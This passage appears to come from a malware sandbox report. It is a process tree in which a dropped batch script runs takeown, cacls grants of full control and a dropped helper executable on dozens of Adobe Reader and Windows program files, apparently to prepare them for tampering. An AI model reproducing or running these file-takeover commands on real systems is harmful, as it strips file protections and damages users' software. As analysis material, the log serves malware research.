    PID:4320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "usa.fca" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4492
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "usa.fca" -nobanner
      4⤵
      Executes dropped EXE
      PID:4464
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  - Loads dropped DLL
  PID:4484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:3608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:4600
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  - Loads dropped DLL
  PID:4548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4668
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:4640
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  - Loads dropped DLL
  PID:884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1356
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:2472
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:3656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3660
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2724
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:4628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1856
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3052
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:4828
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui""
  2⤵
  PID:2212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:2892
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui""
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:4748
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui""
  2⤵
  PID:3580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1292
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Graph.jtp" -nobanner
    3⤵
    PID:2084
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Graph.jtp" -nobanner
      4⤵
      PID:2512
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:1344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:2612
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:5064
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:2860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:860
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2420
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2492
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:2936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    PID:3172
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      PID:3156
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:3188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:580
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:2460
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:3824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:3896
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:3856
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:3428
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:908
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:2312
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:2100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:2536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:2268
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:4180
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:1392
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:3164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:588
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:3228
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:2716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:3972
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    - Modifies file permissions
    PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:3904
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:4800
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:4964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\cmd.exe
